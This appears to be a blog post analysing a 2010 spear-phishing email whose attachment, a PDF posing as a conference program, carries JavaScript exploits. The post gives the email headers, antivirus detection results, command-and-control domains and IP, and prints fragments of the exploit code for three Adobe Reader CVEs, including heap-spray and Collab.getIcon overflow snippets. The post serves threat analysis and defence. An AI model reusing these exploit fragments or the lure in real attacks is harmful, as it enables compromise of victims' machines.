-----Original Message-----
From: 94255015 [mailto:94255015@nccu.edu.tw]
Sent: Tuesday, August 03, 2010 11:24 AM
To: xxxxxxxxx
Subject: Please confirm~
Dear xxxxxxxxxxxxxxxx:
I'm very sorry to bother you,but please to make sure you have attended the meetings,and to confirm the agenda is correct.Thank you very much!
Your sincerely,
Aaron
Headers
Received: (qmail 6491 invoked from network); 3 Aug 2010 15:08:01 -0000
Received: from alumni2.nccu.edu.tw (HELO alumni2.nccu.edu.tw) (140.119.166.13)
by xxxxxxxxxxxx
Received: By OpenMail Mailer;Tue, 03 Aug 2010 23:24:24 +0800 (CST)
From: "94255015" <94255015@nccu.edu.tw>
Reply-To: 94255015@nccu.edu.tw
Subject: Please confirm~
Message-ID: <1280849064.24992.94255015@nccu.edu.tw>
To: "xxxxxxxxx
Date: Tue, 3 Aug 2010 23:24:24 +0800
MIME-Version: 1.0
Return-Path: 94255015@nccu.edu.tw
Content-Type: multipart/mixed; boundary="---=Z8PIZ9?YwlMVFpoZJ2WvJ=sMbD"
140.119.166.13
Hostname: alumni2.nccu.edu.tw
ISP: MOEC
Organization: National Chengchi University
Proxy: None detected
Type: Broadband
Country: Taiwan
File name:conference_program.pdf
http://www.virustotal.com/file-scan/report.html?id=220a1b24e02c2757eccebb6827b4021d570b0f662dd1b0772c22c96b8f6b7c1d-1282772703
Submission date:
2010-08-25 21:45:03 (UTC)
Current status:
17 /42 (40.5%)
Authentium 5.2.0.5 2010.08.25 PDF/Obfusc.G!Camelot
Avast 4.8.1351.0 2010.08.25 JS:Pdfka-gen
Avast5 5.0.594.0 2010.08.25 JS:Pdfka-gen
BitDefender 7.2 2010.08.25 Exploit.PDF-JS.Gen
ClamAV 0.96.2.0-git 2010.08.25 Heuristics.PDF.ObfuscatedNameObject
DrWeb 5.0.2.03300 2010.08.25 Exploit.PDF.1302
Emsisoft 5.0.0.37 2010.08.25 HTML.Malicious!IK
eSafe 7.0.17.0 2010.08.25 PDF.Exploit.4
F-Prot 4.6.1.107 2010.08.25 JS/ShellCode.S
F-Secure 9.0.15370.0 2010.08.25 Exploit.PDF-JS.Gen
GData 21 2010.08.25 Exploit.PDF-JS.Gen
Ikarus T3.1.1.88.0 2010.08.25 HTML.Malicious
Kaspersky 7.0.0.125 2010.08.25 Exploit.JS.Pdfka.cri
nProtect 2010-08-25.02 2010.08.25 Exploit.PDF-Name.Gen
VBA32 3.12.14.0 2010.08.25 Exploit.JS.Pdfka.cri
Additional information
Show all
MD5 : 350924123cbf1b126f4e38335ed6660d
CVE-2009-0927 + CVE-2009-4324 + CVE-2007-5659
____________________________________
CVE-2009-0927
for (i = 0; i < buffersize; i ++ ){
buffer[i] = unescape("%0a%0a%0a%0a");
}
var strtmp3 = "Collab.get" + "Icon(buffer+'_N.bundle');";
eval(strtmp3);
---------------------------------------------------------
CVE-2009-4324
for (i = 0; i < 200; i ++ )memory[i] = block + shellcode;
try {
this .media.newPlayer(null);
}
catch (e){
}
util.printd(String.fromCharCode(2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570,
2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570
, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570), new Date());
}
----------------------------------------------------------------------
CVE-2007-5659
if (app.viewerVersion >= 6.0){
this .collabStore = Collab.collectEmailInfo({
subj : "", msg : plin
Wepawet
http://wepawet.iseclab.org/view.php?hash=350924123cbf1b126f4e38335ed6660d&type=js
---------------------
Windows XP SP2 Adobe Reader 9.11
Created files
%userprofile%\Application Data\diskchk.exe 379E0B3E2C4778075511C4C1E62C0C65
%userprofile%\Local Settings\Temp\2.tmp
C:\a.pdf
%userprofile%\Local Settings\Temp\2.tmp
C:\a.pdf
a.pdf
File name:
diskchk.exe
diskchk.exe
http://www.virustotal.com/file-scan/report.html?id=5ab0bc8ef4f276e2b8a8fa989aa8e35947f1f1a2694f786ab02d4d4b7eeab2d6-1282823469
Submission date:
2010-08-26 11:51:09 (UTC)
Result:
10/ 40 (25.0%)
AntiVir 8.2.4.46 2010.08.26 TR/Crypt.ZPACK.Gen
Avast 4.8.1351.0 2010.08.26 Win32:Malware-gen
Avast5 5.0.594.0 2010.08.26 Win32:Malware-gen
AVG 9.0.0.851 2010.08.26 BackDoor.Generic12.BUOQ
BitDefender 7.2 2010.08.26 Gen:Trojan.Heur.RP.bu0@a86LzSfb
CAT-QuickHeal 11.00 2010.08.24 (Suspicious) - DNAScan
F-Secure 9.0.15370.0 2010.08.26 Gen:Trojan.Heur.RP.bu0@a86LzSfb
GData 21 2010.08.26 Gen:Trojan.Heur.RP.bu0@a86LzSfb
nProtect 2010-08-26.01 2010.08.26 Trojan/W32.Agent.28160.MA
Sophos 4.56.0 2010.08.26 Troj/FkIntel-A
Additional information
Show all
MD5 : 379e0b3e2c4778075511c4c1e62c0c65
Submission date:
2010-08-26 11:51:09 (UTC)
Result:
10/ 40 (25.0%)
AntiVir 8.2.4.46 2010.08.26 TR/Crypt.ZPACK.Gen
Avast 4.8.1351.0 2010.08.26 Win32:Malware-gen
Avast5 5.0.594.0 2010.08.26 Win32:Malware-gen
AVG 9.0.0.851 2010.08.26 BackDoor.Generic12.BUOQ
BitDefender 7.2 2010.08.26 Gen:Trojan.Heur.RP.bu0@a86LzSfb
CAT-QuickHeal 11.00 2010.08.24 (Suspicious) - DNAScan
F-Secure 9.0.15370.0 2010.08.26 Gen:Trojan.Heur.RP.bu0@a86LzSfb
GData 21 2010.08.26 Gen:Trojan.Heur.RP.bu0@a86LzSfb
nProtect 2010-08-26.01 2010.08.26 Trojan/W32.Agent.28160.MA
Sophos 4.56.0 2010.08.26 Troj/FkIntel-A
Additional information
Show all
MD5 : 379e0b3e2c4778075511c4c1e62c0c65
http://anubis.iseclab.org/?action=result&task_id=1f9a7a78ebc252b74a1362b81134726d7
DNS
audnted.flinkup.org 220.246.73.187
facecache.mypicture.info 220.246.73.187
microinfo.3utilities.com 255.255.255.255220.246.73.187
http://www.robtex.com/ip/220.246.73.187.html#whois
Hostname: 187.73.246.220.static.netvigator.com
ISP: PCCW Limited
Organization: PCCW Limited
Type: Broadband
Assignment: Dynamic IP
Country: Hong Kong
City: Kings Park
http://www.robtex.com/dns/187.73.246.220.static.netvigator.com.html#graph
No comments:
Post a Comment